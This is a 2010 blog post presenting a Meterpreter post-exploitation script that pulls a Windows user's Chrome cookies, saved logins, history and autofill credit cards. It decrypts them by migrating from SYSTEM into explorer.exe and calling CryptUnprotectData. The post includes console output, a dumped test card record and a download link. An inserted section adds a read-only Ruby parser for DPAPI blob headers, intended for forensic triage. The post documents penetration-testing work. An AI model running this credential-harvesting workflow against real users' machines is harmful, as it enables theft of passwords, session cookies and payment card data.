Monday, September 20, 2010

Meterpreter Script to extract chrome browser data

About two months ago, Jeremiah Grossman found a nice way to exploit the form autofill feature of the Safari browser to extract the stored data.
A few days later Google announced that Chrome 6 will support form autofill including credit card information.

I was curious how the data is stored and the metasploit project was missing a meterpreter script to extract chrome browser data anyway, so I created one.

The information is stored in sqlite databases and some JSON files. The script downloads these and extracts the useful information from the databases, storing the data in JSON dumps so it is both human readable and easy to parse.

The most sensitive data (auto fill passwords and credit card numbers) is encrypted using the Windows function CryptProtectData:
"Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer."

To decrypt the data, the script calls the CryptUnprotectData function on the target system using the new railgun meterpreter extension.
To make this work, the process on the target system running meterpreter needs to be owned by the user the data belongs to, so this does not work with SYSTEM privileges.
To get the data of the currently logged-on user, the script can automatically migrate into the explorer.exe process and, after the decryption is done, migrate back into the original process.

The following shows the console output of the script:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run enum_chrome -m
[*] current PID is 1100. migrating into explorer.exe, PID=2916...
[*] done.
[*] running as user 'VM-WINXP\test'...
[*] extracting data for user 'test'...
[*] downloading file Web Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Web Data'...
[*] downloading file Cookies to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Cookies'...
[*] downloading file History to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/History'...
[*] downloading file Login Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Login Data'...
[*] downloading file Bookmarks to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Bookmarks'...
[*] downloading file Preferences to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Preferences'...
[*] creating file 'autofill.json'...
[*] creating file 'autofill_profiles.json'...
[*] creating file 'autofill_credit_cards.json'...
[*] decrypting field 'card_number_encrypted'...
[*] creating file 'cookies.json'...
[*] creating file 'history.json'...
[*] creating file 'logins.json'...
[*] creating file 'bookmarks.json'...
[*] creating file 'preferences.json'...
[*] migrating back into PID=1100...
[*] done.
meterpreter >

The file 'autofill_credit_cards.json' contains the following (the field "card_number_encrypted_decrypted" gets added by the script):
[
  {
    "label": "",
    "verification_code_encrypted": "",
    "unique_id": 1,
    "expiration_year": 2010,
    "card_number": "",
    "shipping_address": "",
    "type": "",
    "card_number_encrypted": "\u0001\u0000\u0000\u0000Ð~L~]ß\u0001\u0015Ñ\u0011~Lz\u0000ÀOÂ~Wë\u0001\u0000\u0000\u0000/\u0006E\u000eú«}N~LÁ\u001bjÍ5\u0004~\\u0000\u0000\u0000\u0000\u0002\u0000\u0000\u0000\u0000\u0000\u0003f\u0000\u0000¨\u0000\u0000\u0000\u0010\u0000\u0000\u0000Ú½[~LökºíaÂAÕ\u0013ÖoÚ\u0000\u0000\u0000\u0000\u0004~@\u0000\u0000| \u0000\u0000\u0000\u0010\u0000\u0000\u0000~Eî\\uFÎrgé|i¬.\u0002~P~I\u0018\u0000\u0000\u0000~N£Hvß~FÃÀê%á6h¢Q~Q;j NØ\u0002m±\u0014\u0000\u0000\u0000Yö|#~\~A°µ±ù~Zå·®\u0007éJ~KyÓ",
    "billing_address": "",
    "expiration_month": 12,
    "verification_code": "",
    "name_on_card": "Test Card",
    "card_number_encrypted_decrypted": "0123456789012345"
  }
]
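
The "card_number_encrypted" value above begins with the fixed DPAPI blob prefix (version 1 plus the provider GUID), followed by the GUID of the master key that protects it. The following is an added example, not part of enum_chrome.rb: a read-only header parser for forensic triage of a Chrome profile, showing which fields are DPAPI-protected and under which master key. The function names and the sample blob are constructed for illustration, and the parser assumes raw column bytes as read from the SQLite file.

```ruby
# Added example: read-only triage of DPAPI blob headers; nothing is decrypted.
# Fixed prefix: dwVersion = 1 followed by the DPAPI provider GUID.
DPAPI_MAGIC = ["01000000d08c9ddf0115d1118c7a00c04fc297eb"].pack("H*").freeze
CIPHERS = { 0x6603 => "3DES", 0x6610 => "AES-256" }.freeze

# Format 16 raw bytes as a GUID string (first three fields are little-endian).
def guid(bytes)
  d1, d2, d3 = bytes.unpack("Vvv")
  tail = bytes[8, 8].unpack1("H*")
  format("%08x-%04x-%04x-%s-%s", d1, d2, d3, tail[0, 4], tail[4, 12])
end

# Describe the blob header, or return nil when the value is not a DPAPI blob.
# Assumes raw column bytes (as read from SQLite), not the JSON-escaped string.
def parse_dpapi_header(value)
  data = value.to_s.b
  return nil unless data.bytesize >= 48 && data[0, 20] == DPAPI_MAGIC
  flags, desc_len = data[40, 8].unpack("VV")
  pos = 48 + desc_len                      # cipher fields follow the description
  return nil if data.bytesize < pos + 8    # truncated or corrupt blob
  alg, key_bits = data[pos, 8].unpack("VV")
  desc = data[48, desc_len].force_encoding("UTF-16LE")
  { master_key_guid: guid(data[24, 16]), flags: flags,
    description: desc.encode("UTF-8", invalid: :replace, undef: :replace).delete("\u0000"),
    cipher: CIPHERS.fetch(alg, format("0x%04x", alg)), key_bits: key_bits }
end

# Map each DPAPI-protected field of one dumped record to its master key GUID.
def protected_fields(record)
  record.each_with_object({}) do |(name, value), out|
    header = parse_dpapi_header(value)
    out[name] = header[:master_key_guid] if header
  end
end

# Constructed sample with the header layout of the value shown above: made-up
# master key GUID, empty description, zero-filled salt. Not real protected data.
def sample_blob
  DPAPI_MAGIC + [1].pack("V") + ["00112233445566778899aabbccddeeff"].pack("H*") +
    [0, 2].pack("VV") + "\0\0".b + [0x6603, 168].pack("VV") +
    [16].pack("V") + ("\0" * 16).b
end

record = { "name_on_card" => "Test Card", "expiration_year" => 2010,
           "card_number_encrypted" => sample_blob }
puts protected_fields(record).inspect
```

The master key GUID names a key file in the owning user's profile, which is why the blob can normally only be unprotected in that user's context, as the quoted documentation says.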


You can download the script here: http://github.com/svent/misc/blob/master/metasploit/enum_chrome.rb

21 comments:

  1. Hi,

    Metasploit v3.4.2 not supported? Running BackTrack 4. Can you update your script?
